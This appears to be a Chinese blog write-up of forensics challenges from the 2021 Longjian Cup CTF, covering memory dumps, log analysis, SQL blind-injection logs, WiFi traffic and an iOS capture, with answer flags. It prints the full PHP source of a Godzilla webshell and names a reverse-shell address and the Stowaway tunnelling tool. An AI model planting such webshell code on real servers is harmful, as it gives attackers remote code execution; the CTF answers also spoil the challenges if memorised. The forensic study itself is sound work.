陇剑杯-2
煤矿路口西 Lv4

首届“陇剑杯”网络安全大赛-2


内存分析

6.1

虚拟机密码找mimikatz

安装插件后运行

28

flag{W31C0M3 T0 THiS 34SY F0R3NSiCX}

6.2

题干提到关键词,某品牌手机&图片

首先搜索桌面文件

29

发现HUAWEI字样

搜索HUAWEI字样

30

依次dumpfiles

解压exe文件得到

31

搜索得到一个解密程序kobackupdec

kali里执行未果

windows中

32

找到images.tar

33

简单日志分析

7.1

34

如上图所示,user为攻击参数

答案:user

7.2

解码如同所示base64,发现cat命令查看的文件绝对路径。

35

36

答案:/Th4s_IS_VERY_Import_Fi1e

7.3

同样发现一条base64解码后是具有反弹shell的地址,解出。

37

38

答案:192.168.2.197:8888

SQL注入

8.1

黑客在注入过程中采用的注入手法叫_____________。(格式为4个汉字,例如“拼搏努力”)

39

答案:布尔盲注

8.2

黑客在注入过程中,最终获取flag的数据库名、表名和字段名是_____________。(格式为“数据库名#表名#字段名”,例如database#table#column)

直接分析日志,根据if语句的判断条件和每行后面状态码判断就行

40

8.3

黑客最后获取到的flag字符串为_____________。

同8.2,继续分析日志就行

41

答案:flag{deddcd67-bcfd-487e-b940-1217e668c7db}

wifi

9.1

流量包里记录了攻击机的攻击流量,

参考上述题目,通过filescan发现存在【wifi】字样

下载后是一个加密压缩包

42

提示Network Adapter GUID

找了很久,意外在iehistory中发现类似字符

43

{529B7D2A-05D1-4F21-A001-8F4FF817FC3A}/{E3C4941F-44A3-4E23-924D-67A2B3680A87}.xml

尝试解压

得到xml

44

以为flag是233@114514_qwe

但不对

尝试搜索wifi&解密&WPA2PSK

最后找到https://www.jianshu.com/p/7e8ddf4338cd?utm_campaign=maleskine&utm_content=note&utm_medium=seo_notes&utm_source=recommendation

45

46

得到解码后的流量包

解码无果后,重新尝试哥斯拉木马连接

分别在服务器端和客户端得到

请求包和相应包

通过处理得到

,@session_start();
@set_time_limit(0);
@error_reporting(0);
function encode($D,$K){
for($i=0;$i<strlen($D);$i++) {
$c = $K[$i+1&15];
$D[$i] = $D[$i]^$c;
}
return $D;
}
$pass='key';
$payloadName='payload';
$key='3c6e0b8a9c15224a';
if (isset($_POST[$pass])){
$data=encode(base64_decode($_POST[$pass]),$key);
if (isset($_SESSION[$payloadName])){
$payload=encode($_SESSION[$payloadName],$key);
eval($payload);
echo substr(md5($pass.$key),0,16);
echo base64_encode(encode(@run($data),$key));
echo substr(md5($pass.$key),16);
}else{
if (stripos($data,"getBasicsInfo")!==false){
$_SESSION[$payloadName]=encode($data,$key);
}
}
}

在本地搭建哥斯拉木马连接并修改response

47

得到flag

48

ios

10.1

黑客所控制的C&C服务器IP是_____________。

搜索分组字节流github,找到No.17375的数据

最下面就是ip

49

答案为:3.128.156.159

10.2

黑客利用的Github开源项目的名字是______。(如有字母请全部使用小写)

还是No.17375的数据流,追踪HTTP流就可以看到项目的Github地址,由地址可知名字是Stowaway

50

所以答案是:stowaway

10.3

通讯加密密钥的明文是____________。

还是No.17375的数据,在ip -s后就是加密密钥

51

答案: hack4sec

10.4

黑客通过SQL盲注拿到了一个敏感数据,内容是____________。

导入keylog.txt,过滤条件:tcp.stream eq 271 and ip.src == 192.168.1.8 and tls

52

然后根据这些数据手拼出答案

答案:746558f3-c841-456b-85d7-d6c0f2edabb2

10.5

因为是端口爆破,需要找连续的端口,找了好久只有10-499连续,所以猜测答案是10-499

53

54

答案:10-499

10.7

根据10.4的sql盲注,可知攻击了192.168.1.12,又根据access.log攻击者还攻击了172.28.0.2

55

56

答案:172.28.0.2#192.168.1.12

10.8

黑客写入了一个webshell,其密码为____________。

打开access.log文件,就可以看到webshell的密码

57

答案: fxxk

  • 本文标题:陇剑杯-2
  • 本文作者:煤矿路口西
  • 创建时间:2021-09-14 11:13:30
  • 本文链接:http://www.mklkx.xyz/2021/09/14/陇剑杯-2/
  • 版权声明:本博客所有文章除特别声明外,均采用 BY-NC-SA 许可协议。转载请注明出处!